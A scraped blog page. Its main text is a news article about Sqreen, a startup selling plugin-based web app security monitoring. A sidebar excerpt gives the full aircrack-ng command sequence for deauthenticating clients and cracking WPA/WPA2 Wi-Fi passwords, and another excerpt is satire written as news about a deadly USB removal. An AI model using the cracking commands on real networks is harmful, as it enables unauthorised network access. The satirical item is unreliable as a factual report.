Skip to main content

Sqreen wants to become the IFTTT of web app security

Image
By


French startup Sqreen recently launched a Security Hub with dozens of plugins to put you in control of the security of your web app. In many ways, it feels like enabling tasks on popular automation service IFTTT.

Sqreen participated in TechCrunch’s Startup Battlefield and Y Combinator’s current batch. The vision of the product hasn’t changed. Sqreen lets you protect your web service with little effort from your side.

Big companies have dedicated security teams that protect services, try to run attacks to find weaknesses and more. Smaller companies don’t necessarily have enough time and money to build a dedicated team. But your product is still vulnerable to SQL injections, XSS attacks and brute-force attacks.

Sqreen isn’t a firewall. You just have to install a library package on your server and add a couple of lines at the top your source code to require the Sqreen module in your application.

Once this is done, Sqreen monitors attacks in real time without a big performance hit — the startup says there’s a 4 percent CPU overhead. Sqreen now works for web apps in Node.js, Ruby, PHP, Python or Java.

In addition to protecting you against common attacks, Sqreen makes security recommendations so that you can regularly fix vulnerabilities. And with GDPR coming soon, tech companies have a greater responsibility when it comes to protecting customer data and disclosing hacks.

Customers wanted to know more about what Sqreen was doing. That’s why Sqreen launched a security hub with documented plugins.

“All security vendors are very secretive,” Sqreen co-founder and CEO Pierre Betouin. “Usually, you can’t test the product and you have no information on what they do. We were like this at the beginning of Sqreen. Our positioning was really ‘install our library and we’ll cover a range of security features.’”

“We had a big push back. So we wondered how we could be more transparent, provide something more rational. We explain each plugin completely.”







You can find a plugin to protect you against SQLite injections, vulnerable dependencies, XSS Javascript injections in various frameworks, bot activity, etc.

Sqreen will recommend plugins for your app depending on the technologies and frameworks you’re using. You can then enable or disable each plugin and configure notifications on Slack or PagerDuty for instance.

In the future, you can imagine that third-party companies could contribute to this marketplace and add new plugins. Sqreen is also working on other plugins related to email abuse and payment page protection.

In addition to those new features, Betouin is moving to San Francisco and opening an office there. Companies like Front, Mindbody, BlaBlaCar, Triplebyte, Toptal and Algolia are now using Sqreen.

Comments

Post a Comment

Popular posts from this blog

Building a smarter home

By
The Jetsons  presented a highly entertaining vision of what  homes  of the future would  look like . The animated television show anticipated a world where humans would be able to do everything with just the push of a button. In many ways, the show turned out to be prophetic; today we have printable food, video chats, smartwatches and robots that help with housework — and flying cars may even be on the way. The challenge for companies is to integrate digital technologies in meaningful ways that enhance people’s  homes  and improve their lives. Many of the innovations to emerge over the past few years have been geared toward this kind of “push-button living.” Thanks to the rise of smartphones and the proliferation of cheap sensors, it is possible to make just about any household appliance “smart” and “connected.” By 2019,  companies are expected to ship 1.9 billion connected home devices, bringing in about $490 billion in revenue. ...
Post a Comment
Read more

Oculus’ New $99 Samsung Gear VR Makes Serious Virtual Reality Affordable

By
At half the price of its last mobile VR headset, the new $99  Oculus-made  Samsung Gear VR is cheap enough to unlock virtual reality for the mainstream. Revealed today at the Oculus Connect conference, it works with the whole 2015 line of Samsung Smartphones including the Note 5, S6, S6 Edge, and S6 Edge+. It will ship in November in time for Black Friday. Compared to the $199 previous Gear VRs that only worked with fewer phones, this headset will be a lot more accessible. The new Gear VR is 22% lighter, making it more comfortable to wear. The trackpad on the temple of the headset also now has a tactile directional pad on it so your finger will know where it’s touching. The previous Gear VRs had a smooth trackpad and sometimes it was to tough to know if you were touching it or just the unsensitive shell of the headset when you couldn’t see for yourself. There’s also a new Gear VR Gamepad which all the Oculus Connect conference attendees will get for free. It features an...
Post a Comment
Read more

Careless USB removal causes multiple deaths

By
EIGHTEEN workers have died after a USB stick was removed from a computer without adequate precautions. The offices of Hereford-based Envision Photography were completely destroyed in the ensuing blast. Survivor Norman Steele said: “My colleague Helen had put some files on the stick to work on at home, and she yanked it out of the computer before anyone could scream ‘no’. “I kicked her aside as a jet of white-hot flame belched out of the USB port and set fire to the desk opposite. “Grabbing her, I dived through the window just before all the PCs in the network exploded with purple electricity that fried everyone in the building. “I sprinted to my car, knowing that the printers were already becoming merciless hunter-killer drones, shouting for Helen to follow. “But when I looked round I saw her frozen, something glowing in her hand, the awareness dawning of her fate. She was still holding the USB. “She detonated in a flash of ultraviolet light that turned eve...
Post a Comment
Read more

Facebook ‘Class Action’ Privacy Lawsuit Moves To Austrian Supreme Court

By
A privacy lawsuit filed against Facebook last year by Viennese lawyer and data privacy activist Max Schrems has moved up to Austria’s Supreme Court which will rule on whether the suit can be treated as a class action. When Schrems kicked off the suit, back in July 2014, he invited adult non-commercial Facebook users located anywhere outside the U.S. and Canada to join the suit for free — and tens of thousands of people quickly took up the invitation. The legal action focuses on multiple areas where the plaintiffs argue Facebook has been violating EU data protection laws, such as the absence of effective consent to many types of data use; the tracking of Internet users through external websites; and the monitoring and analysis of users via big data systems. Facebook’s participation in the NSA’s PRISM surveillance program is also part of the complaint. In July the case suffered a setback when an Austrian regional co...
Post a Comment
Read more

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

By
In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only. Things we used for cracking WPA & WPA2: Alfa AWUSO36H Wireless Card Windows 7-64bit (works on 32bit) VMware Workstation Kali Linux 2.0 Command to crack WPA & WPA2: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux: In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.
Post a Comment
Read more